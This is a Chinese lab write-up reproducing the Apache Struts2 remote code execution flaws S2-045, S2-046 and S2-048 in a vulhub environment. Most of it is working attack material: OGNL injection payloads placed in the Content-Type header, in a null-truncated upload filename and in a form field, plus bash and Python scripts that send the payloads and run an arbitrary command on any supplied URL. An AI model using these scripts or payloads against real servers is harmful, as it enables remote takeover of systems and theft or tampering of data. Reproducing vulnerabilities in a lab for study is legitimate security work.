vuhub靶场struts2漏洞复现（三）

0x01、S2-045 远程代码执行漏洞

原理

当基于Jakarta插件上传文件时，可导致远程代码执行。例如在系统中获得管理员权限，执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露，重要信息遭到篡改等重大危害。

影响版本

Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10

poc

发送数据包时修改以下字段：

Content-Type:
%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data

网上找到payload，但未能复现成功

#!/bin/bash

url=$1

boundary="---------------------------WEBKIT198919991920098822555"
content_type="multipart/form-data; boundary=$boundary"
payload=$(echo "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','whoami'}:{'/bin/bash','-c','$2'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}")

if [[ $1 ]]; then
	echo "================HTTP GET Method================";
	curl "$url" -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36" -H "Content-Type: $payload"  -H "Connection: close" 2>/dev/null
	echo "================HTTP POST Method================"
	curl  -X 'POST' "$url" -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36" -H "Content-Type: $payload" -H "Connection: close" --data-binary "test" 2>/dev/null
else :
	echo "$0 [url]"
fi

./s2-045.sh url cmd

0x02、S2-046 远程代码执行漏洞

原理

与s2-045类似，但是输入点在文件上传的filename值位置，并需要使用\x00截断。

影响版本

Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10

复现

import socket

q = b'''------WebKitFormBoundaryXd004BVJN9pBYBL2
Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',233*233)}\x00b"
Content-Type: text/plain

foo
------WebKitFormBoundaryXd004BVJN9pBYBL2--'''.replace(b'\n', b'\r\n')
p = b'''POST / HTTP/1.1
Host: localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,es;q=0.6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2
Content-Length: %d

'''.replace(b'\n', b'\r\n') % (len(q), )

with socket.create_connection(('192.168.184.128', '8080'), timeout=5) as conn:
    conn.send(p + q)
    print(conn.recv(10240).decode())

在filename中插入以下代码

%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',233+123)}\x00b

找到b之前的字符，进行00截断

poc执行命令

#!/bin/bash

url=$1

boundary="---------------------------WEBKIT198919991920098822555"
content_type="multipart/form-data; boundary=$boundary"
payload=$(echo "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','whoami'}:{'/bin/bash','-c','$2'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}")

if [[ $1 ]]; then
	echo "================HTTP GET Method================";
	printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nzzzzz\r\n--$boundary--\r\n\r\n" "$payload" | curl "$url" -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36" -H "Content-Type: $content_type"  -H "Connection: close" --data-binary @- $@ 2>/dev/null
	echo "================HTTP POST Method================"
	printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nzzzzz\r\n--$boundary--\r\n\r\n" "$payload" | curl  -X 'POST' "$url" -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36" -H "Content-Type: $content_type" -H "Connection: close" --data-binary @- $@ 2>/dev/null
else :
	echo "$0 [url]"
fi

用法

./t.sh url cmd

0x03、S2-048 远程代码执行漏洞

原理

构造恶意的字段值通过Struts2的struts2-struts1-plugin插件，远程执行代码。

影响版本

2.0.0 - 2.3.32

漏洞复现

访问http://your-ip:8080/showcase/即可查看到struts2的测试页面。

访问Integration/Struts 1 Integration

触发OGNL表达式的位置是Gangster Name这个表单。

输入${233*233}即可查看执行结果（剩下两个表单随意填写）

将如下POC填入表单Gengster Name中，提交即可直接回显命令执行的结果：

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}